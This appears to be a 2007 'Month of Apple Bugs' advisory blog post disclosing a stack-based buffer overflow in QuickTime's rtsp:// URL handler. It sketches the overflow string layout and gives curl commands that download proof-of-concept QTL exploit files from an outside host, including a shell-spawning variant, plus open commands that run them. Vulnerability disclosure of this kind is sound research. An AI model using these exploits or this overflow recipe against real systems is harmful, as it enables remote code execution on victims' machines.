Monday, January 1, 2007

MOAB-01-01-2007: Apple Quicktime rtsp URL Handler Stack-based Buffer Overflow

A vulnerability exists in the handling of the rtsp:// URL handler. By supplying a specially crafted string (rtsp:// [random] + colon + [299 bytes padding + payload]), an attacker could overflow a stack-based buffer, using either HTML, Javascript or a QTL file as attack vector, leading to an exploitable remote arbitrary code execution condition.
For further information:
Happy New Year!

Update: An example QTL file exploiting this issue (pwnage.qtl) is available (it will say 'happy new year' via /usr/bin/say, and expects the command string to be located at 0x17a053c, tested on Mac OS X 10.4.8 8L2127, x86 architecture). If it doesn't work on your system, use the exploit to generate another QTL with your own options or the shell spawn variant (pwnage-shell.qtl, 100% reliable for a current up-to-date x86-based OS X system). Usage:

$ curl http://projects.info-pull.com/moab/bug-files/pwnage.qtl -o pwnage.qtl
(...)
$ open pwnage.qtl
$ curl http://projects.info-pull.com/moab/bug-files/pwnage-shell.qtl -o pwnage-shell.qtl
(...)
$ open pwnage-shell.qtl

No comments: